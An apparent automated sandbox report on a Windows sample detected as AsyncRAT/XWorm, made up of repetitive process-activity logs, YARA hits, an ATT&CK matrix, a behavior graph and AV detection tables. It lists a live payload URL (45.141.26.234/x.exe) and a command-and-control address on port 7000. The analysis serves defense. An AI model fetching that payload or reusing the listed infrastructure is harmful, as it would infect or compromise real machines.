                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_00405573 GetVersionExW,GetVersionExW,0_2_00405573
                              Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Yara detected AsyncRAT
                              Source: Yara matchFile source: 5.0.x.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 616, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED
                              Source: x.exe, 00000005.00000002.3281056817.000000001B238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\AppData\Local\Temp\x.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected XWorm
                              Source: Yara matchFile source: 5.0.x.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000005.00000002.3264722419.0000000002301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3264722419.000000000234A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 616, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Yara detected XWorm
                              Source: Yara matchFile source: 5.0.x.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000005.00000002.3264722419.0000000002301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3264722419.000000000234A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 616, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts12
                              Windows Management Instrumentation                              		1
                              Scripting                              		1
                              DLL Side-Loading                              		11
                              Disable or Modify Tools                              		1
                              Input Capture                              		2
                              File and Directory Discovery                              		Remote Services11
                              Archive Collected Data                              		11
                              Ingress Tool Transfer                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Native API                              		1
                              DLL Side-Loading                              		11
                              Process Injection                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory24
                              System Information Discovery                              		Remote Desktop Protocol1
                              Input Capture                              		1
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job                              		1
                              Scheduled Task/Job                              		1
                              Scheduled Task/Job                              		11
                              Obfuscated Files or Information                              		Security Account Manager541
                              Security Software Discovery                              		SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Standard Port                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts3
                              PowerShell                              		2
                              Registry Run Keys / Startup Folder                              		2
                              Registry Run Keys / Startup Folder                              		2
                              Software Packing                              		NTDS1
                              Process Discovery                              		Distributed Component Object ModelInput Capture2
                              Non-Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading                              		LSA Secrets151
                              Virtualization/Sandbox Evasion                              		SSHKeylogging122
                              Application Layer Protocol                              		Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              Masquerading                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                              Virtualization/Sandbox Evasion                              		DCSync1
                              System Network Configuration Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                              Process Injection                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574852 Sample: da6ke5KbfB.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 48 ip-api.com 2->48 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 21 other signatures 2->60 10 da6ke5KbfB.exe 8 2->10         started        signatures3 process4 file5 46 C:\Users\user\AppData\Local\Temp\...\D64E.bat, Non-ISO 10->46 dropped 13 cmd.exe 1 10->13         started        16 conhost.exe 10->16         started        process6 signatures7 74 Suspicious powershell command line found 13->74 18 x.exe 14 6 13->18         started        23 powershell.exe 14 16 13->23         started        process8 dnsIp9 50 ip-api.com 208.95.112.1, 49705, 80 TUT-ASUS United States 18->50 42 C:\ProgramData\Java Update (32bit).exe, PE32 18->42 dropped 62 Antivirus detection for dropped file 18->62 64 Multi AV Scanner detection for dropped file 18->64 66 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->66 70 6 other signatures 18->70 25 powershell.exe 23 18->25         started        28 powershell.exe 23 18->28         started        30 powershell.exe 18->30         started        32 powershell.exe 18->32         started        52 45.141.26.234, 49704, 49792, 7000 SPECTRAIPSpectraIPBVNL Netherlands 23->52 44 C:\Users\user\AppData\Local\Temp\x.exe, PE32 23->44 dropped 68 Powershell drops PE file 23->68 file10 signatures11 process12 signatures13 72 Loading BitLocker PowerShell Module 25->72 34 conhost.exe 25->34         started        36 conhost.exe 28->36         started        38 conhost.exe 30->38         started        40 conhost.exe 32->40         started        process14

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              da6ke5KbfB.exe55%ReversingLabsWin32.Trojan.Boxter
                              da6ke5KbfB.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\ProgramData\Java Update (32bit).exe100%AviraTR/Spy.Gen
                              C:\Users\user\AppData\Local\Temp\x.exe100%AviraTR/Spy.Gen
                              C:\ProgramData\Java Update (32bit).exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
                              C:\ProgramData\Java Update (32bit).exe79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                              C:\Users\user\AppData\Local\Temp\x.exe79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://45.141.26.234/x.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSER0%Avira URL Cloudsafe
                              http://45.141.26.234/x.exeC0%Avira URL Cloudsafe
                              http://45.141.26.234/x.exeDX0%Avira URL Cloudsafe
                              http://45.141.26.234/x.exeUQ0%Avira URL Cloudsafe
                              http://45.141.26.234/x.exeV0%Avira URL Cloudsafe
                              http://45.141.26.234/x.exeG0%Avira URL Cloudsafe
                              http://45.141.26.234/x.exeUSERDOMAIN=user-PCUScu0%Avira URL Cloudsafe
                              http://45.141.26.234/x.exe100%Avira URL Cloudmalware
                              http://www.microsoft.coX20%Avira URL Cloudsafe
                              http://www.microsoft.I0%Avira URL Cloudsafe
                              http://45.141.26.234/x.exe:0%Avira URL Cloudsafe
                              http://crl.microso60%Avira URL Cloudsafe
                              http://45.141.26.234/x.exez0%Avira URL Cloudsafe
                              http://45.141.26.234/x.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFIE=0%Avira URL Cloudsafe
                              45.141.26.2340%Avira URL Cloudsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              ip-api.com
                              		208.95.112.1
                              		truefalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://45.141.26.234/x.exetrue
                                • Avira URL Cloud: malware
                                		unknown
                                45.141.26.234true
                                • Avira URL Cloud: safe
                                		unknown
                                http://ip-api.com/line/?fields=hostingfalse
                                  		high

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
